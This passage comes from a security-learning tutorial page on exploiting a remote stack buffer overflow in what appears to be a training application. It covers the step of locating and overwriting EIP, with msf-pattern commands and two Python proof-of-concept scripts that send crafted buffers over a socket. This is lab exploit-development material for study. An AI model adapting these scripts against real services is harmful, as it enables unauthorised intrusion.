LogoLogo
  • 🤩Welcome!
  • Buffer overflow
    • Remote Buffer Overflow
      • Crashing the Application
      • Controlling the EIP
      • Finding Bad Characters
      • Finding a Return Address
      • Generating Shellcode
      • Getting a Shell
  • Wireless Penetration Testing
    • Wifi Pineapple - Tetra
      • Setup
      • Firmware Upgrade
      • Capturing Wireless Handshake
      • Cracking WPA2 Handshake
      • PineAP
      • Modules
  • PortSwigger Labs
    • Authentication
      • Username enumeration via different responses
      • Username enumeration via subtly different responses
      • Username enumeration via response timing
  • TryHackMe
    • 🎄Advent of Cyber 3 (2021)
      • [Day 1] Save The Gifts
      • [Day 2] Elf HR Problems
      • [Day 3] Christmas Blackout
      • [Day 4] Santa's Running Behind
      • [Day 5] Pesky Elf Forum
      • [Day 6] Patch Management Is Hard
      • [Day 7] Migration Without Security
      • [Day 8] Santa's Bag of Toys
      • [Day 9] Where Is All This Data Going
  • Google Cloud Computing
    • ☁️Cloud Computing Fundamentals
      • Getting Started with Cloud Shell and gcloud
      • Creating a Virtual Machine
      • App Engine: Qwik Start - Python
      • Cloud Functions: Qwik Start - Command Line
      • Kubernetes Engine: Qwik Start
      • Set Up Network and HTTP Load Balancers
Powered by GitBook
On this page
  • Creating Pattern
  • Update POC
  • controllingEip.py
  • Controlling Eip
  • Locating EIP
  • controlledEip.py
  • Controlled Eip

Was this helpful?

  1. Buffer overflow
  2. Remote Buffer Overflow

Controlling the EIP

To take control of the EIP, we first need to locate the EIP’s exact position in the buffer of 600. To do this we will make use of a tool called “msf-pattern_create”.

PreviousCrashing the ApplicationNextFinding Bad Characters

Last updated 3 years ago

Was this helpful?

Creating Pattern

msf-pattern_create -l 600

Update POC

After creating the pattern, modify the code from the previous iteration (Crasher.py) to send the newly generated pattern as the buffer instead.

controllingEip.py

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    buffer = prefix + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")

Controlling Eip

python controllingEip.py

EIP = 41397241

Further inspecting the registers, as shown above, reveals that our EIP now has a unique value instead of the 4 bytes of “\x41” OR “A” we saw in the previous iteration.

Locating EIP

Now that we have sent in our custom pattern and extracted the value @ EIP, we have to figure out where that is in the buffer. The tool ”msf-pattern_offset” will help us with that.

msf-pattern_offset -l 600 -q 41397241

EIP Was found at 537 Bytes

controlledEip.py

Now let's verify that by further modifying our initial code, we are able to write 4 Bs OR 4 bytes of \x42 into the EIP.

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    filler = "A" * 537
    eip = "B" * 4
    buffer = prefix + filler + eip

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    s.send(buffer)

    s.close()

    print ("\nDone!")
  
except:
    print ("\nCould not connect!")

Controlled Eip

python controlledEip.py

After running the new exploit code, we are able to see that we have successfully over-written the EIP with \x42\x42\x42\x42. Now we have gained control of the EIP and are ready to move on to the next step.